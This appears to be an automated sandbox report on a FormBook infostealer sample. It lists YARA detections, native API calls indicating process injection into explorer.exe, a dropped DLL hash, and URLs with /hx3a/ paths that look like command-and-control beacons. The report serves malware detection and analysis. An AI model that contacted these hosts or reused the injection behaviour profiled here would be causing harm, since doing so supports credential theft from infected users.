Source: explorer.exe, 00000007.00000002.474718381.0000000004FC2000.00000004.00000001.sdmp, String found in binary or memory: http://julianlawoffices.law/hx3a/?tZUT=Iu/IXyUbTVDu5P2JH19Ubbm/NNayCdBr7HPQNpzBLmA
Source: explorer.exe, 00000007.00000002.474718381.0000000004FC2000.00000004.00000001.sdmp, String found in binary or memory: http://tonton-koubou.com/hx3a/?tZUT=vULSFbXUfWqfH/UQKANXmh//LRVD9fF
Source: explorer.exe, 00000004.00000000.241792611.0000000008B46000.00000002.00000001.sdmp, String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000004.00000000.241792611.0000000008B46000.00000002.00000001.sdmp, String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000004.00000000.241792611.0000000008B46000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000004.00000000.241792611.0000000008B46000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000004.00000000.241792611.0000000008B46000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000004.00000000.241792611.0000000008B46000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000004.00000000.241792611.0000000008B46000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000004.00000000.241792611.0000000008B46000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000004.00000000.241792611.0000000008B46000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000004.00000000.241792611.0000000008B46000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000004.00000000.241792611.0000000008B46000.00000002.00000001.sdmp, String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000007.00000002.472073266.0000000002DBC000.00000004.00000020.sdmp, String found in binary or memory: http://www.formula-kuhni.com/eIm#
Source: explorer.exe, 00000007.00000002.472169147.0000000002DCF000.00000004.00000020.sdmp, String found in binary or memory: http://www.formula-kuhni.com/hx3a/?tZUT=caEAE6TOQuxSMBR5BS8nf
Source: explorer.exe, 00000004.00000000.241792611.0000000008B46000.00000002.00000001.sdmp, String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000004.00000000.241792611.0000000008B46000.00000002.00000001.sdmp, String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000004.00000000.241792611.0000000008B46000.00000002.00000001.sdmp, String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000004.00000000.241792611.0000000008B46000.00000002.00000001.sdmp, String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000004.00000000.241792611.0000000008B46000.00000002.00000001.sdmp, String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000004.00000000.241792611.0000000008B46000.00000002.00000001.sdmp, String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000004.00000000.241792611.0000000008B46000.00000002.00000001.sdmp, String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000004.00000000.241792611.0000000008B46000.00000002.00000001.sdmp, String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000004.00000000.241792611.0000000008B46000.00000002.00000001.sdmp, String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000004.00000000.241792611.0000000008B46000.00000002.00000001.sdmp, String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000004.00000000.241792611.0000000008B46000.00000002.00000001.sdmp, String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000004.00000000.241792611.0000000008B46000.00000002.00000001.sdmp, String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000004.00000000.241792611.0000000008B46000.00000002.00000001.sdmp, String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000004.00000000.241792611.0000000008B46000.00000002.00000001.sdmp, String found in binary or memory: http://www.zhongyicts.com.cn
Note: the font-vendor and license URLs from the 00000004 explorer.exe dumps (fontbureau.com, founder.com.cn, sakkal.com and the like) are font metadata resident in explorer.exe and not indicators from the sample. The strings that matter are the /hx3a/ URLs from the 00000007 dumps, and julianlawoffices.law appears in neither the C2 list nor the decoy list of the extracted configuration.
Source: C:\Users\user\Desktop\AQJEKNHnWK.exe, Code function: 0_2_00404EA0 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,lstrlenA,GlobalUnlock,SetClipboardData,CloseClipboard,

E-Banking Fraud:

Yara detected FormBook
Source: Yara match, File source: 00000007.00000002.467033203.00000000004E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000002.216654991.000000001EEF0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000001.00000002.256189783.0000000000A00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000001.00000001.210481681.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000001.00000002.255958752.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000001.00000002.256046021.00000000005E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000007.00000002.468337581.0000000000840000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000007.00000002.468235656.0000000000810000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 1.2.AQJEKNHnWK.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 1.1.AQJEKNHnWK.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 1.2.AQJEKNHnWK.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.2.AQJEKNHnWK.exe.1eef0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 1.1.AQJEKNHnWK.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.2.AQJEKNHnWK.exe.1eef0000.4.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000007.00000002.467033203.00000000004E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.467033203.00000000004E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.216654991.000000001EEF0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.216654991.000000001EEF0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.256189783.0000000000A00000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.256189783.0000000000A00000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000001.210481681.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000001.210481681.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.255958752.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.255958752.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.256046021.00000000005E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.256046021.00000000005E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.468337581.0000000000840000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.468337581.0000000000840000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.468235656.0000000000810000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.468235656.0000000000810000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.AQJEKNHnWK.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.AQJEKNHnWK.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.1.AQJEKNHnWK.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.AQJEKNHnWK.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.AQJEKNHnWK.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.AQJEKNHnWK.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.AQJEKNHnWK.exe.1eef0000.4.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.AQJEKNHnWK.exe.1eef0000.4.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.1.AQJEKNHnWK.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.AQJEKNHnWK.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.AQJEKNHnWK.exe.1eef0000.4.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.AQJEKNHnWK.exe.1eef0000.4.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exe | Code function: 1_2_004181C0 NtCreateFile,
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exe | Code function: 1_2_00418270 NtReadFile,
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exe | Code function: 1_2_004182F0 NtClose,
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exe | Code function: 1_2_004183A0 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exe | Code function: 1_2_004182EA NtClose,
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exe | Code function: 1_2_0041839A NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exe | Code function: 1_2_00AA98F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exe | Code function: 1_2_00AA9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exe | Code function: 1_2_00AA9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exe | Code function: 1_2_00AA99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exe | Code function: 1_2_00AA9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exe | Code function: 1_2_00AA9A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exe | Code function: 1_2_00AA9A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exe | Code function: 1_2_00AA9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exe | Code function: 1_2_00AA95D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exe | Code function: 1_2_00AA9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exe | Code function: 1_2_00AA96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exe | Code function: 1_2_00AA9660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exe | Code function: 1_2_00AA97A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exe | Code function: 1_2_00AA9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exe | Code function: 1_2_00AA9FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exe | Code function: 1_2_00AA9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exe | Code function: 1_2_00AA98A0 NtWriteVirtualMemory,
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exe | Code function: 1_2_00AA9820 NtEnumerateKey,
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exe | Code function: 1_2_00AAB040 NtSuspendThread,
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exe | Code function: 1_2_00AA99D0 NtCreateProcessEx,
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exe | Code function: 1_2_00AA9950 NtQueueApcThread,
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exe | Code function: 1_2_00AA9A80 NtOpenDirectoryObject,
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exe | Code function: 1_2_00AA9A10 NtQuerySection,
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exe | Code function: 1_2_00AAA3B0 NtGetContextThread,
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exe | Code function: 1_2_00AA9B00 NtSetValueKey,
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exe | Code function: 1_2_00AA95F0 NtQueryInformationFile,
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exe | Code function: 1_2_00AA9520 NtWaitForSingleObject,
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exe | Code function: 1_2_00AAAD30 NtSetContextThread,
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exe | Code function: 1_2_00AA9560 NtWriteFile,
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exe | Code function: 1_2_00AA96D0 NtCreateKey,
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exe | Code function: 1_2_00AA9610 NtEnumerateValueKey,
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exe | Code function: 1_2_00AA9670 NtQueryInformationProcess,
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exe | Code function: 1_2_00AA9650 NtQueryValueKey,
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exe | Code function: 1_2_00AA9730 NtQueryVirtualMemory,
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exe | Code function: 1_2_00AAA710 NtOpenProcessToken,
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exe | Code function: 1_2_00AA9760 NtOpenProcess,
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exe | Code function: 1_2_00AA9770 NtSetInformationFile,
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exe | Code function: 1_2_00AAA770 NtOpenThread,
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exe | Code function: 1_1_004181C0 NtCreateFile,
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exe | Code function: 1_1_00418270 NtReadFile,
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exe | Code function: 1_1_004182F0 NtClose,
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exe | Code function: 1_1_004183A0 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exe | Code function: 1_1_004182EA NtClose,
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exe | Code function: 1_1_0041839A NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_049795D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_04979540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_049796D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_049796E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_04979650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_04979660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_04979780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_04979FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_04979710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_04979840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_04979860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_049799A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_04979910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_04979A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_049795F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_0497AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_04979520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_04979560 NtWriteFile,
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_04979610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_04979670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_049797A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_0497A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_04979730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_0497A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_04979770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_04979760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_049798A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_049798F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_04979820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_0497B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_049799D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_04979950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_04979A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_04979A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_04979A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_04979A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_0497A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_04979B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_004F81C0 NtCreateFile,
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_004F8270 NtReadFile,
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_004F82F0 NtClose,
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_004F83A0 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_004F82EA NtClose,
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_004F839A NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exe | Code function: 0_2_0040314A EntryPoint,#17,OleInitialize,SHGetFileInfoA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,GetCommandLineA,GetModuleHandleA,CharNextA,OleUninitialize,ExitProcess,lstrcatA,CreateDirectoryA,lstrcatA,lstrcatA,DeleteFileA,GetModuleFileNameA,lstrcmpiA,CopyFileA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exe | Code function: 0_2_004046A7
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exe | Code function: 1_2_0040102C
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exe | Code function: 1_2_00401030
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exe | Code function: 1_2_0041B881
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exe | Code function: 1_2_0041C10F
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exe | Code function: 1_2_0041A2A6
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exe | Code function: 1_2_0041BC41
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exe | Code function: 1_2_00408C5C
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exe | Code function: 1_2_00408C60
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exe | Code function: 1_2_00402D90
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exe | Code function: 1_2_0041CEF6
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exe | Code function: 1_2_00402FB0
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exe | Code function: 1_2_00A920A0
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exe | Code function: 1_2_00B320A8
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exe | Code function: 1_2_00A7B090
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exe | Code function: 1_2_00B328EC
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exe | Code function: 1_2_00B3E824
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exe | Code function: 1_2_00B21002
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exe | Code function: 1_2_00A84120
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exe | Code function: 1_2_00A6F900
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exe | Code function: 1_2_00B322AE
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exe | Code function: 1_2_00A9EBB0
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exe | Code function: 1_2_00B2DBD2
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exe | Code function: 1_2_00B203DA
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exe | Code function: 1_2_00B32B28
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exe | Code function: 1_2_00A7841F
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exe | Code function: 1_2_00B2D466
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exe | Code function: 1_2_00A92581
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exe | Code function: 1_2_00A7D5E0
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exe | Code function: 1_2_00B325DD
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exe | Code function: 1_2_00A60D20
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exe | Code function: 1_2_00B32D07
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exe | Code function: 1_2_00B31D55
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exe | Code function: 1_2_00B32EF7
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exe | Code function: 1_2_00A86E30
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exe | Code function: 1_2_00B2D616
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exe | Code function: 1_2_00B31FF1
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exe | Code function: 1_2_00B3DFCE
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exe | Code function: 1_1_0040102C
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exe | Code function: 1_1_00401030
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exe | Code function: 1_1_0041B881
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exe | Code function: 1_1_0041C10F
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exe | Code function: 1_1_0041A2A6
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exe | Code function: 1_1_0041BC41
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exe | Code function: 1_1_00408C5C
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exe | Code function: 1_1_00408C60
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_0494841F
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_049FD466
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_04962581
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_0494D5E0
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_04A025DD
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_04A02D07
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_04930D20
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_04A01D55
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_04A02EF7
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_049FD616
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_04956E30
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_04A01FF1
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_0494B090
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_04A020A8
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_049620A0
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_04A028EC
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_049F1002
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_0493F900
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_04954120
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_04A022AE
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_0496EBB0
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_049FDBD2
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_04A02B28
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_004FA2A6
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_004E8C5C
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_004E8C60
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_004E2D90
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_004FCEF6
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_004E2FB0
          Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\nsxFC1A.tmp\bdww7k1w8bk0.dll 6C4628D2A5D9FE67953D21A7AB0FF49BAC94B69FB32B5A1FA94AE8CB71A4D693
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: String function: 0493B150 appears 35 times
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exe | Code function: String function: 00419F70 appears 34 times
